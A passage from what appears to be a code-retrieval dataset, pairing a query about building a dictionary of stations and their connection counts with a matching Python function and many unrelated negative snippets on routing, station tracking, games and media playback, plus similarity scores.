timeremainingSeconds = int(timeremainingSeconds)\n timeremainingMinutes = int(timeremainingSeconds/60)\n\n # print(marketid)\n # ID match, ID not Zero (exclude IFs), less than 57 mins (exclude undercuts)\n if (playerid == marketid) and (playerid != 0) and (timeremainingMinutes < 55):\n buynowprice = player[8]\n buynowprice = int(buynowprice)\n if (buynowprice != 10000):\n buynowprices.append(buynowprice)\n\n try:\n minimumbin = min(buynowprices)\n except:\n log_event(\n self.queue, \"ID mismatch -- minimum bin price array was empty\")\n log_event(self.queue, \"Minimum bin set to 0\")\n minimumbin = 0\n playername = self.getPlayerCardName(playerid)\n\n log_event(self.queue, str(playername) +\n \" min buy now from market data: \" + str(minimumbin))\n\n # Now we have player ID, and their lowest bin -- update it on GUI\n data = [playerid, minimumbin]\n id_and_lowest_bin.append(data)\n\n txt = open(\"./data/player_list.txt\", \"r\", encoding=\"utf8\")\n\n playerlist = []\n for aline in txt:\n values2 = aline.strip(\"\\n\").split(\",\")\n playerlist.append(values2)\n\n # Now that playerlist is saved in temp memory, clear the old user input list\n hs = open(\"./data/player_list.txt\", \"r+\", encoding=\"utf8\")\n hs.truncate(0)\n hs.close()\n\n # This is a terribly inefficient way of updating the GUI's playerlist with the market price. Its a first draft\n for entry in playerlist:\n # ignore blank line\n if (len(entry) > 3):\n entryid = int(entry[7])\n entry_futbinprice = int(entry[9])\n new_updated_actual_price = 0\n for x in id_and_lowest_bin:\n id = int(x[0])\n price = x[1]\n diff = entryid - id\n if (diff == 0):\n # print(\"got here\")\n mktprice = int(price)\n fbinprice = int(entry_futbinprice)\n diff = mktprice - fbinprice\n if (diff > 1000):\n new_updated_actual_price = fbinprice\n log_event(self.queue, \"Market price (\" + str(mktprice) +\n \") seems odd, will use Futbin price (\" + str(fbinprice) + \").\")\n else:\n log_event(\n self.queue, \"Confirmed mkt price seems accurate\")\n new_updated_actual_price = price\n\n # print(new_updated_actual_price)\n full_entry = \"\"\n count = 0\n for word in entry:\n if (count == 11):\n word = new_updated_actual_price\n word = str(word)\n word_comma = word + \",\"\n full_entry += word_comma\n count += 1\n\n # Remove last comma\n full_entry = full_entry[:-1]\n\n # Add new line to end\n hs = open(\"./data/player_list.txt\", \"a\", encoding=\"utf8\")\n hs.write(full_entry + \"\\n\")\n hs.close()", "def init_base_stations(mec_set: Dict[str,'Mec']) -> None:\n \n mec_keys = []\n mec_names = []\n \n for key, value in mec_set.items():\n mec_keys.append(key)\n mec_names.append(value.name)\n \n \n base_station_set = {\n \"base_station_set\": {}\n }\n \n bs_topology = onos_controller.OnosController.get_topology()\n mec_index = 0\n \n for base_station in bs_topology: \n bs_links = {}\n \n for link in base_station.links:\n dst_id = link.dst.device\n dst_port = link.dst.port\n dst_latency = None\n bs_links[dst_id] = {\n 'port': dst_port,\n 'latency': dst_latency\n } \n \n mec_name = 'MEC' + base_station.name[2:]\n mec_index = mec_names.index(mec_name)\n \n new_base_station_id = base_station.id\n new_base_station = BaseStation(\n name = base_station.name, \n mec_id = mec_keys[mec_index], \n wireless_latency = round(random.uniform(0.1, 0.3), 2),\n links = DefaultMunch.fromDict(bs_links)\n )\n base_station_set['base_station_set'][new_base_station_id] = new_base_station\n \n \n BaseStationController.set_bs_net_latency(base_station_set['base_station_set'])\n json_controller.EncoderController.encoding_to_json(base_station_set)\n return", "def build_next_stations(stations):\n\n station_0_bikes = stations[0]['bikesAvailable']\n station_1_bikes = stations[1]['bikesAvailable']\n\n return f\"On station {stations[0]['name']} is {station_0_bikes} \" \\\n f\"bike{'s' if station_0_bikes > 1 else ''} available and on station\" \\\n f\"{stations[1]['name']} is {station_1_bikes} \" \\\n f\"bike{'s' if station_1_bikes > 1 else ''} available. Goodbye and happy cycling!\"", "def addStationMarker(self, x, y, label, staMinDist=STA_MIN_DIST, **kwargs):\n xAlong, minDist = projectXYOnTransect(\n x, y, self.xyPoints[\n :, 0], self.xyPoints[\n :, 1], self.xAlong)\n if minDist > staMinDist:\n print 'point too far from the transect, omitting', label, minDist, staMinDist\n return\n # if close enough, just use x coordinate\n transectSnapshot.addStationMarker(self, xAlong, label, **kwargs)", "def dykstra(self,origin):\n G = nx.Graph()\n G.add_node(origin,shortest_path = 0)\n active_nodes = [origin]\n\n while len(active_nodes) > 0:\n a_n = active_nodes.pop() # active node\n\n for n in self.neighbors.get(a_n,[]): #catch no neighbor exception\n d = self.difference(n, origin)**4 # increase cost of extra distance\n this_path = G.node[a_n]['shortest_path'] + d\n\n if this_path < self.epsilon:\n if n in G.node: # seen this node before\n if this_path < G.node[n]['shortest_path']: # if this path is better than previous best path\n G.node[n]['shortest_path'] = this_path\n G.add_edge(a_n,n) # add edge just because\n continue\n\n G.add_node(n,shortest_path = this_path) # if this is new, add it to graph\n G.add_edge(a_n,n) # add edge just because\n active_nodes.append(n) # add new active node\n return G", "def get_best_roundtrip(self):\n out = min(self.outgoing_flights, key=lambda f: f.price)\n ret = min(self.return_flights, key=lambda f: f.price)\n\n return RoundTrip(out, ret)", "def shortest_flight(self):\r\n distance = sys.maxsize\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n if edge.distance < distance:\r\n distance = edge.distance\r\n start = edge.start\r\n destination = edge.destination\r\n return start, destination, distance", "def start_trip(self, trip):\n with closing(self.db.cursor()) as cursor:\n t = datetime.datetime.fromtimestamp(time.time()).strftime(\"%Y-%m-%d %H:%M:%S\")\n query = \"INSERT INTO Trips (StartTime, EndTime) VALUES('\"+t+\"', '\"+t+\"')\"\n #cursor = self.db.cursor()\n cursor.execute(query)\n trip.set_id(cursor.lastrowid)\n self.db.commit()", "def run():\n #Initialise variables\n data = build_station_list()\n update_water_levels(data)\n ls = []\n ID = []\n \n #Number of days in past taken data from\n dt = 7\n #How many graphs per window\n limit = 4\n #How many stations\n number = 6\n \n #Create list of measuring_id's sorted by water level\n for station in data:\n if station.typical_range_consistent() == True and station.relative_water_level() != None:\n ls.append((station, station.relative_water_level()))\n\n ls = sorted_by_key(ls, 1)\n \n for station in ls:\n ID.append(station[0])\n \n s = count_inconsistent_sets(ID[:number], dt)\n \n ID = ID[:number+s]\n\n plot_water_levels(ID, dt, limit, s)", "def add_market_street(market, start):\r\n market.append(make_market_street(start))", "def nearest_neighbor_tsp(shortest_paths, starting_point=0):\n number_of_nodes = len(shortest_paths)\n unvisited_nodes = list(range(number_of_nodes))\n unvisited_nodes.remove(starting_point)\n visited_nodes = [starting_point]\n\n while number_of_nodes > len(visited_nodes):\n neighbor_distances = pd.Series(shortest_paths[visited_nodes[-1]])\n neighbor_distances = neighbor_distances[(neighbor_distances > 0) &\n (neighbor_distances.index\n .isin(set(unvisited_nodes)))]\n next_node = neighbor_distances.idxmin()\n visited_nodes.append(next_node)\n unvisited_nodes.remove(next_node)\n return visited_nodes", "def addWlan(self, station): \n phyInt.phy[station] = phyInt.totalPhy[self.currentPhy][3:]\n os.system(\"iw phy phy%s set netns %s\" % (phyInt.phy[station], station.pid)) \n wif = station.cmd(\"iwconfig 2>&1 | grep IEEE | awk '{print $1}'\").split(\"\\n\")\n wif.pop()\n for iface in wif:\n if iface[:4]==\"wlan\":\n try:\n self.nextWlan[str(station)] += 1\n except:\n self.nextWlan[str(station)] = 0\n netxWlan = self.nextWlan[str(station)] \n self.renameIface(station, netxWlan, iface)\n self.currentPhy+=1", "def addStationMarker(\n self,\n tag,\n x,\n y,\n label,\n staMinDist=STA_MIN_DIST,\n **kwargs):\n if tag != 'all':\n xPts = self.xyPoints[tag][:, 0]\n yPts = self.xyPoints[tag][:, 1]\n xAlo = self.xAlong[tag]\n xAlong, minDist = projectXYOnTransect(x, y, xPts, yPts, xAlo)\n if minDist > staMinDist:\n print 'point too far from the transect, omitting', tag, label, minDist, staMinDist\n return\n # if close enough, just use x coordinate\n stackTransectPlot.addStationMarker(\n self, tag, xAlong, label, **kwargs)\n else:\n for t in self.plots: # recursion\n self.addStationMarker(t, x, y, label, staMinDist, **kwargs)", "def set_track_info(self, payload):\n self.raw_trackname = payload['currentTrack'].get('title', \"\")\n self.artist = payload['currentTrack'].get('artist', \"\")\n self.album = payload['currentTrack'].get('album', \"\")\n self.station = payload['currentTrack'].get('stationName', \"\")\n\n if sonos_settings.artist_and_album_newlook :\n if self.raw_trackname.startswith(\"x-sonosapi-\") :\n self.raw_trackname = self.station\n\n if self.artist == self.station and self.type == \"radio\" :\n if self.raw_trackname.count(\"~\") : c = \"~\"\n elif self.raw_trackname.count(\"˗\") : c = \"˗\"\n elif self.raw_trackname.count(\"*\") : c = \"*\"\n elif self.raw_trackname.count(\"|\") : c = \"|\"\n elif self.raw_trackname.count(\" - \") : c = \" - \"\n elif self.raw_trackname.count(\" / \") : c = \" / \"\n else : c = \"\"\n\n if c :\n oldstr=self.raw_trackname.casefold()\n splitstr = oldstr.split(c)\n self.artist = ' '.join(word[0].upper() + word[1:] for word in splitstr[0].split())\n self.raw_trackname = ' '.join(word[0].upper() + word[1:] for word in splitstr[1].split())\n if c == \"~\" :\n self.album = ' '.join(word[0].upper() + word[1:] for word in splitstr[2].split())\n else :\n self.album = \"\"\n# self.album = self.station\n\n # Abort update if all data is empty\n if not any([self.album, self.artist, self.duration, self.station, self.raw_trackname]):\n _LOGGER.debug(\"No data returned by the API, skipping update\")\n return None\n\n if self.type == \"radio\" and not self.station:\n # if not then try to look it up (usually because its played from Alexa)\n self.station = find_unknown_radio_station_name(self.raw_trackname)\n\n # Clear uninteresting tracknames\n if self.raw_trackname.startswith(\"x-sonosapi-\") or self.raw_trackname.endswith(\".m3u8\"):\n self.trackname = \"\"\n else:\n self.trackname = self.raw_trackname\n\n\n track_id = self.artist\n if self.trackname:\n track_id += f\" - {self.trackname}\"\n if self.album:\n track_id += f\" ({self.album})\"\n if self.duration:\n track_id += f\" - {timedelta(seconds=self.duration)}\"\n if self.station:\n track_id += f\" [{self.station}]\"\n\n return track_id", "def start(self):\r\n self.setDriver('ST', 1)", "def _sampleTrackway(self, trackway, windowSize):\n\n window = []\n samples = []\n\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n\n for entry in entries:\n # For each track entry in the trackways data add that to the sample window and update\n # the samples result\n\n window.append(entry)\n\n if len(window) < windowSize:\n # Don't create a sample until the sub-sample list exceeds the sample window size\n continue\n\n xTests = [] # X spatial position values\n yTests = [] # Y spatial position values\n angleTests = [] # Heading angle values\n curvePosTests = [] # Curve position values\n for item in window:\n # Calculate weighted averages for various properties of the current sample window\n\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n\n # Create a ValueUncertainty for the curve position by using the fractional\n # positional uncertainty over the spatial length of the curve\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)\n curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition\n curvePosUnc = abs(posUnc/analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))\n\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(\n x=xValue.raw, xUnc=xValue.rawUncertainty,\n y=yValue.raw, yUnc=yValue.rawUncertainty)\n\n # Remove the oldest sample from the to make room for a new sample in the next iteration\n window.pop(0)\n\n if len(samples) > 0:\n # Compare this sample to the previous one and if it does not differ\n # significantly then continue to continue to the next iteration\n last = samples[-1].directionAngle\n totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty\n deviation = abs(directionAngleMean.raw - last.raw)/totalUnc\n if deviation < 2.0:\n continue\n\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=directionAngleMean,\n position=position,\n curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.uncertainty),\n curvePosition=curvePositionMean,\n track=entry.track ))\n\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples", "def start_traffic(self):\n raise NotImplementedError", "def set_start_times(self):\n for i in self.legs:\n assert isinstance(i, RelayLeg)\n i.set_start_time_from_previous()", "def getShortestCoordinate (analyzer,startLat, startLon, endLat, endLon):\n estacionOrigen=model.getCloserStation (analyzer, startLat, startLon)\n estacionDestino=model.getCloserStation (analyzer, endLat, endLon)\n ruta,tiempo=model.getShortestCoordinate(analyzer,estacionOrigen, estacionDestino)\n return (estacionOrigen,estacionDestino,ruta,tiempo)", "def media_next_track(self):\n self._lms.query(self._id, 'playlist', 'index', '+1')\n self.update_ha_state()", "def reserve(n):\n global _tracks\n if n >= len(_tracks):\n _tracks += [False]*(n-len(_tracks)+1)\n _tracks[n] = True", "def start_tracker(self):\n while self.tracker_enabled:\n # Sleep a bit to leave more time to other threads\n time.sleep(Tracker.LOOP_SLEEP)\n # self._log_queue_lengths()\n if not self.frames_to_track:\n continue\n frame_to_track = self.frames_to_track.popleft()\n frame_tracked = self.track_controllers_in_frame(\n frame_to_track, self.drum_set.controllers)\n self.frames_tracked.append(frame_tracked)\n self.drum_set.play()", "def choose_next_player(self):\n player_index = self.players.index(self.current_player)\n if self.direction_clock_wise:\n if player_index >= len(self.players) - 1:\n self.current_player = self.players[0]\n else:\n self.current_player = self.players[player_index + 1]\n else:\n if player_index <= 0:\n self.current_player = self.players[len(self.players) - 1]\n else:\n self.current_player = self.players[player_index - 1]", "def initSource(\n frame,\n center,\n observation,\n symmetric=False,\n monotonic=True,\n thresh=1,\n maxComponents=1,\n edgeDistance=1,\n shifting=False,\n downgrade=True,\n fallback=True,\n minGradient=0,\n):\n from .source import PointSource, ExtendedSource\n\n while maxComponents > 1:\n try:\n source = ExtendedSource(\n frame,\n center,\n observation,\n thresh=thresh,\n shifting=shifting,\n K=maxComponents,\n )\n try:\n source.check_parameters()\n # Make sure that SED is >0 in at least 1 band\n if np.any(\n [\n np.all(child.children[0].get_model() <= 0)\n for child in source.children\n ]\n ):\n raise ArithmeticError\n except ArithmeticError:\n msg = \"Could not initialize source at {} with {} components\".format(\n center, maxComponents\n )\n logger.warning(msg)\n raise ValueError(msg)\n\n if downgrade and np.all(np.array(source.bbox.shape[1:]) <= 8):\n # the source is in a small box so it must be a point source\n maxComponents = 0\n elif downgrade and np.all(np.array(source.bbox.shape[1:]) <= 16):\n # if the source is in a slightly larger box\n # it is not big enough to model with 2 components\n maxComponents = 1\n elif hasEdgeFlux(source, edgeDistance):\n source.shifting = True\n\n break\n except Exception as e:\n if not fallback:\n raise e\n # If the MultiComponentSource failed to initialize\n # try an ExtendedSource\n maxComponents -= 1\n\n if maxComponents == 1:\n try:\n source = ExtendedSource(\n frame, center, observation, thresh=thresh, shifting=shifting\n )\n\n try:\n source.check_parameters()\n if np.all(source.children[0].get_model() <= 0):\n raise ArithmeticError\n except ArithmeticError:\n msg = \"Could not initlialize source at {} with 1 component\".format(\n center\n )\n logger.warning(msg)\n raise ValueError(msg)\n\n if downgrade and np.all(np.array(source.bbox.shape[1:]) <= 16):\n # the source is in a small box so it must be a point source\n maxComponents = 0\n elif hasEdgeFlux(source, edgeDistance):\n source.shifting = True\n except Exception as e:\n if not fallback:\n raise e\n # If the source is too faint for background detection,\n # initialize it as a PointSource\n maxComponents -= 1\n\n if maxComponents == 0:\n try:\n source = PointSource(frame, center, observation)\n except Exception:\n # None of the models worked to initialize the source,\n # so skip this source\n return None\n\n if hasEdgeFlux(source, edgeDistance):\n # The detection algorithm implemented in meas_algorithms\n # does not place sources within the edge mask\n # (roughly 5 pixels from the edge). This results in poor\n # deblending of the edge source, which for bright sources\n # may ruin an entire blend. So we reinitialize edge sources\n # to allow for shifting and return the result.\n if not isinstance(source, PointSource) and not shifting:\n return initSource(\n frame,\n center,\n observation,\n symmetric,\n monotonic,\n thresh,\n maxComponents,\n edgeDistance,\n shifting=True,\n )\n source.isEdge = True\n else:\n source.isEdge = False\n\n return source", "def initialize_new_spot(new_spot_data, connected_data):\n if (connected_data.keys()):\n new_id = max(connected_data.keys()) + 1\n else:\n new_id = 1\n connected_data[new_id] = np.expand_dims(new_spot_data, 0)", "def set_player_start_position(self):\n if self.field_size.x() == 0: return\n \n parts = len(self.player_list)\n y_list = []\n for p in range(1,parts+1):\n y_list.append(self.field_size.y()*p/(parts+1))\n\n for i,p in enumerate(self.player_list):\n p1 = Qt.QPoint(self.start_y,y_list[i])\n p2 = Qt.QPoint(self.start_y+self.start_length,y_list[i])\n p.set_start_position([p1,p2])\n p.status_remove = False\n p.override_direction(0)", "def make_start_moves(self):\n self.geos = Geos([])\n\n if g.config.machine_type == 'drag_knife':\n self.make_swivelknife_move()\n return\n\n # Get the start rad. and the length of the line segment at begin.\n start_rad = self.shape.parentLayer.start_radius\n\n # Get tool radius based on tool diameter.\n tool_rad = self.shape.parentLayer.getToolRadius()\n\n # Calculate the starting point with and without compensation.\n start = self.start\n angle = self.angle\n\n if self.shape.cut_cor == 40:\n self.append(RapidPos(start))\n \n elif self.shape.cut_cor != 40 and not g.config.vars.Cutter_Compensation[\"done_by_machine\"]:\n\n toolwidth = self.shape.parentLayer.getToolRadius()\n offtype = \"in\" if self.shape.cut_cor == 42 else \"out\"\n offshape = offShapeClass(parent = self.shape, offset = toolwidth, offtype = offtype)\n\n if len(offshape.rawoff) > 0:\n start, angle = offshape.rawoff[0].get_start_end_points(True, True)\n\n self.append(RapidPos(start))\n self.geos += offshape.rawoff\n\n # Cutting Compensation Left\n elif self.shape.cut_cor == 41:\n # Center of the Starting Radius.\n Oein = start.get_arc_point(angle + pi/2, start_rad + tool_rad)\n # Start Point of the Radius\n Ps_ein = Oein.get_arc_point(angle + pi, start_rad + tool_rad)\n # Start Point of the straight line segment at begin.\n Pg_ein = Ps_ein.get_arc_point(angle + pi/2, start_rad)\n\n # Get the dive point for the starting contour and append it.\n start_ein = Pg_ein.get_arc_point(angle, tool_rad)\n self.append(RapidPos(start_ein))\n\n # generate the Start Line and append it including the compensation.\n start_line = LineGeo(start_ein, Ps_ein)\n self.append(start_line)\n\n # generate the start rad. and append it.\n start_rad = ArcGeo(Ps=Ps_ein, Pe=start, O=Oein,\n r=start_rad + tool_rad, direction=1)\n self.append(start_rad)\n\n # Cutting Compensation Right\n elif self.shape.cut_cor == 42:\n # Center of the Starting Radius.\n Oein = start.get_arc_point(angle - pi/2, start_rad + tool_rad)\n # Start Point of the Radius\n Ps_ein = Oein.get_arc_point(angle + pi, start_rad + tool_rad)\n # Start Point of the straight line segment at begin.\n Pg_ein = Ps_ein.get_arc_point(angle - pi/2, start_rad)\n\n # Get the dive point for the starting contour and append it.\n start_ein = Pg_ein.get_arc_point(angle, tool_rad)\n self.append(RapidPos(start_ein))\n\n # generate the Start Line and append it including the compensation.\n start_line = LineGeo(start_ein, Ps_ein)\n self.append(start_line)\n\n # generate the start rad. and append it.\n start_rad = ArcGeo(Ps=Ps_ein, Pe=start, O=Oein,\n r=start_rad + tool_rad, direction=0)\n self.append(start_rad)", "def connect_stim(self):\n self.stim = h.NetStim()\n self.stim.number = self.stim_number\n self.stim.start = 9\n self.ncstim = h.NetCon(self.stim, self.cells[0].synlist[0])\n self.ncstim.delay = 1\n self.ncstim.weight[0] = self.stim_w # NetCon weight is a vector.", "def constructShortestPath(self):\r\n sp = []\r\n v = self.t\r\n while self.preds[v]: # is not None\r\n sp.append(v)\r\n v = self.preds[v]\r\n sp.append(self.s) # source\r\n sp.reverse() # to have the path from source to dest and not t to s\r\n return sp, self.graph.getCoords(sp)", "def start_tracker(self):\n\n # Load the live_craft_position service\n live_craft_position = None\n\n # Start the tracker if there isn't already one running\n if self._tracking_update_loop is None or not self._tracking_update_loop.running:\n self._live_craft_position_service = live_craft_position\n self._tracking_update_loop = task.LoopingCall(self._track_target)\n tracking_loop_deferred = self._tracking_update_loop.start(self.update_interval)\n tracking_loop_deferred.addErrback(self._handle_tracker_error)\n return tracking_loop_deferred\n else:\n return None", "def setUpNextGameRound(self):\n\t\tself.pots = [0]\n\t\tself.currentBet = [0]\n\t\tself.reinitDeck()\n\t\tself.communityCards = []\n\t\tallPlayers = self.getPlayers()\n\t\tself.resetPlayerHands(allPlayers)\n\t\tself.resetPlayerBetAmount(allPlayers)\n\t\t_, seat = self.findNthPlayerFromSeat(self.curDealerSeatNo, 1)\n\t\tself.curDealerSeatNo = seat\n\t\tself.beginRound()", "def get_station_graph(start_station_id, end_station_list):\n start_station_graph = []\n for i in range(10):\n if end_station_list[i] is not None:\n start_station_graph.append((start_station_id, end_station_list[i]))\n return start_station_graph", "def rrt_search(self):\n self.tree.AddVertex(self.start_config)\n self.tree.AddEdge(self.start_config, self.start_config)\n\n while True:\n x_new, x_nearest = self.new_and_near()\n if x_new is None:\n # print(\"it's None\")\n continue\n # connect shortest valid edge\n # print(\"new point\", x_new)\n self.connect_to_point(x_nearest, x_new)\n\n # probabilistically check if solution found\n if self.goal_config in self.tree.vertices:\n print(\"find it\")\n path = self.planning_env.reconstruct_path(self.tree.edges, self.start_config, self.goal_config)\n if path is not None:\n return path\n\n if self.name=='rrtstar' and self.tree.samples_taken > 10:\n return []\n # # check if can connect to goal after generating max_samples\n if self.tree.samples_taken >= self.tree.max_samples:\n return []", "def getShortestPath(self, src, dest):\n vertices = self.floorGraph.getVertList()\n unvisitedQueue = []\n srcPath = Path()\n srcPath.addNode(src)\n srcPath.pathValue = 0\n unvisitedQueue.append(srcPath)\n connections = self.floorGraph.getVertex(src).getConnections()\n #initialisez distances\n for vertex in vertices:\n newPath = Path()\n newPath.nodeList = list(srcPath.nodeList)\n newPath.addNode(vertex)\n if self.floorGraph.getVertex(vertex) in connections:\n newPath.pathValue = self.floorGraph.getVertex(src).getWeight(self.floorGraph.getVertex(vertex))\n unvisitedQueue.append(newPath)\n else:\n newPath.pathValue = math.inf\n self.shortestDistanceMap[src+vertex] = newPath\n # updates distances as per shorter routes\n while len(unvisitedQueue) is not 0:\n unvisitedQueue = sorted(unvisitedQueue, key=functools.cmp_to_key(compareNodes))\n chkPath = unvisitedQueue.pop(0)\n chkNode = chkPath.nodeList[len(chkPath.nodeList)-1]\n for vertex in vertices:\n if(self.floorGraph.getVertex(vertex) in self.floorGraph.getVertex(chkNode).getConnections()):\n newWeight = chkPath.pathValue + self.floorGraph.getVertex(chkNode).getWeight(self.floorGraph.getVertex(vertex))\n if(newWeight < self.shortestDistanceMap[src+vertex].pathValue):\n self.shortestDistanceMap[src+vertex].pathValue = newWeight\n self.shortestDistanceMap[src+vertex].nodeList = list(chkPath.nodeList)\n self.shortestDistanceMap[src+vertex].nodeList.append(vertex)\n newPath = Path()\n newPath.nodeList = list(self.shortestDistanceMap[src+vertex].nodeList)\n newPath.pathValue = newWeight\n unvisitedQueue.append(newPath)\n print(self.shortestDistanceMap[src+dest].nodeList)\n print(self.shortestDistanceMap[src+dest].pathValue)", "def start_ranging(self):\n Utils.check(VL53L1X_C_LIBRARY.VL53L1_StartMeasurement(self.dev))", "def stations():\n\n return station_list", "def a_star(start, goal='Bucharest'):\n x,_ = min([(x, y + lr[x]) for x, y in d[start]], key = lambda x: x[1])\n if x not in lista_final:\n lista_final.append(x)\n else:\n x,_ = sorted([(x, y + lr[x]) for x, y in d[start]],key=lambda x: x[1])[1]\n lista_final.append(x)\n \n if 'Bucharest' not in lista_final:\n a_star(lista_final[-1])\n return(lista_final)", "def place_hub(self, board, state): # pylint: disable=W0613\n minspot = None\n mincost = None\n for i in range(0, board.rows):\n for j in range(0, board.cols):\n if minspot is None:\n minspot = (i, j)\n mincost = self.costs[i][j]\n elif self.costs[i][j] < mincost:\n minspot = (i, j)\n mincost = self.costs[i][j]\n self.hub = minspot\n return minspot", "def begin(self):\r\n self.queue.append((self.start, 0.0))\r\n self.cost_to_pos[self.start] = 0\r\n self.loop()", "def connectSticks(A):\n if len(sticks) == 1:\n return 0\n\n import heapq\n heapq.heapify(sticks)\n\n cost = 0\n while len(sticks) > 1:\n x, y = heapq.heappop(sticks), heapq.heappop(sticks)\n cost += x + y\n heapq.heappush(sticks, x+y)\n\n return cost", "def startup(self):\n # Initializing the cycle data (cd) dictionary\n self.cd[\"started_up\"] = False\n self.cd[\"peak_pressure\"] = 0\n self.cd[\"tidal_volume\"] = 0\n self.cd[\"inhale_duration\"] = 0\n self.cd[\"exhale_duration\"] = 0\n self.cd[\"IE_ratio\"] = 1\n self.cd[\"PEEP\"] = 0\n\n to = 2 # Timeout\n startup_cycles = 0\n limit = 20\n # If the piston position is unknown\n last_cycle = time.time()\n while not self.piston.piston_at_bottom and not self.piston.piston_at_top:\n if self.pst_dir == 1:\n self.piston.pst_up()\n if time.time() - last_cycle > to:\n self.pst_dir = 0\n startup_cycles += 1\n last_cycle = time.time()\n else:\n self.piston.pst_down()\n if time.time() - last_cycle > to:\n self.pst_dir = 1\n startup_cycles += 1\n last_cycle = time.time()\n if startup_cycles >= limit:\n print(\"There is a problem at startup, check compressed air\")\n print(f\"Tried to startup for {startup_cycles} cycles\")\n # Breaks the loop so that the controller doesn't start\n self.signal_startup_error.emit(True)\n return\n while not self.piston.piston_at_top:\n self.piston.pst_up()\n self.piston.stop()\n\n print(f\"startup_cycles: {startup_cycles}\")\n self.cd[\"started_up\"] = True\n self.signal_cycle_data.emit(self.cd)\n # Duration of the first tare of the system\n tare_duration = 5.0\n time.sleep(tare_duration)\n self.signal_get_tare.emit(tare_duration)\n # Waits a little bit just to make sure that the respirator isn't working when the controller \n # is called\n time.sleep(0.5)\n self.piston_control()", "def track_04():\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)\n return \"Ok\"", "def __init__(self, station_file: str, ride_file: str) -> None:\n self.all_stations = create_stations(station_file)\n self.all_rides = create_rides(ride_file, self.all_stations)\n self.visualizer = Visualizer()\n self.active_rides = []" ]
[ "0.73916966", "0.72347254", "0.6283393", "0.5770273", "0.53530777", "0.5282217", "0.5246007", "0.5129842", "0.5115605", "0.5112706", "0.5046593", "0.50430566", "0.5032552", "0.5032552", "0.5012475", "0.50104666", "0.5006915", "0.49982488", "0.49773306", "0.49151057", "0.48719123", "0.4867851", "0.48675522", "0.48566422", "0.48527646", "0.48435965", "0.4822101", "0.4806031", "0.48015013", "0.47571078", "0.47429278", "0.47362965", "0.46954757", "0.4689146", "0.46676704", "0.4663138", "0.46514398", "0.46416545", "0.46394286", "0.4629448", "0.4620208", "0.46197492", "0.4616199", "0.46033698", "0.45730788", "0.4572733", "0.45687827", "0.4555525", "0.4551504", "0.4550578", "0.4531297", "0.45262617", "0.45180565", "0.44948322", "0.44704565", "0.44617343", "0.4460196", "0.44568026", "0.44562238", "0.44491524", "0.4445041", "0.4443889", "0.44312268", "0.44294733", "0.4429072", "0.44232753", "0.44203132", "0.44194084", "0.44115806", "0.44083098", "0.44068122", "0.4404135", "0.4398573", "0.4391987", "0.4386293", "0.43839118", "0.43829063", "0.43821403", "0.4379656", "0.43755886", "0.43722117", "0.43704355", "0.43673813", "0.4366082", "0.43649644", "0.4364628", "0.43607378", "0.43587387", "0.435607", "0.4352831", "0.43509305", "0.43482918", "0.43466926", "0.43462017", "0.43449494", "0.4344154", "0.43437362", "0.43367893", "0.4336417", "0.43354836" ]
0.59082127
3
Makes dictionary of the station and their amount of connections.
def make_station_dict(self): self.station_dict = {} # interates over stations and puts the amount of connections in the dict for station in self.stations: length = len(self.stations[station].connections) self.station_dict[station] = length return self.station_dict
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def stations_dict(self):\n return self.__stations_dict", "def get_online_count():\n return dict(online_user=get_online_users())", "def getConnections():\n\n c = psutil.net_connections()\n connects = {}\n\n count = 0\n for connection in c:\n conn = {}\n status = connection.status\n if status == 'ESTABLISHED' or connection.status == 'CLOSE_WAIT':\n conn['status'] = status\n conn['local'] = connection.laddr[0] + ':' + str(connection.laddr[1])\n conn['remote'] = connection.raddr[0] + ':' + str(connection.raddr[1])\n connects[count] = conn\n count += 1\n elif status == 'LISTEN':\n conn['status'] = status\n conn['local'] = connection.laddr[0] + ':' + str(connection.laddr[1])\n connects[count] = conn\n count += 1\n else:\n pass\n\n return connects", "def get_stats(self):\n return {\n \"pings_sent\" : self.ping_count,\n \"measurements\" : self.measurements,\n }", "def to_dict(self) -> dict:\n return {'Stations': [station.as_json_dict() for station in self.stations]}", "def connected_component_statistics(self, printStats=False):\n lengths = self.connected_component_lengths()\n lengthDict = dict(collections.Counter(lengths))\n\n if printStats:\n orderedLengthDict = collections.OrderedDict(sorted(lengthDict.items()))\n numberOfGroups = nx.number_connected_components(self.return_undirected())\n for k, v in orderedLengthDict.iteritems():\n percent = round((100.00*v / numberOfGroups), 2)\n print str(k) + ' nodes: ' + str(v) + ' (' + str(percent) + '%) groups'\n print '-----------------------------------------'\n print 'TOTAL: ' + str(super(SynonymNetwork, self).number_of_nodes()) + ' nodes in network, ' + str(numberOfGroups) + ' distinct groups'\n else:\n return lengthDict", "def connected_network_devices(self):\n connected = {'ip': self.ip, 'port': self.port}\n return connected", "def num_stations(self) -> int:\n return self._num_stations", "def to_dict(self):\n\n out = super().to_dict()\n out[\"connections\"] = self.connections\n return out", "def to_dict(self):\n result = {'Id': self.id, 'Na': self.name, \\\n 'Sc': self.schedule.to_dict(), 'Lc': self.location.to_dict()}\n if len(self.connections)>0:\n result['Co'] = self.connections_to_string()\n return result", "def station_list() -> List[Dict]:\n return STATIONS", "def create_dict(info):\n \"\"\"\n dict = {ip: {counter:*}, {weekdays: []}, {hours: []}}\n \"\"\"\n dict_info = dict()\n for i in info:\n ip = i[0]\n hours = 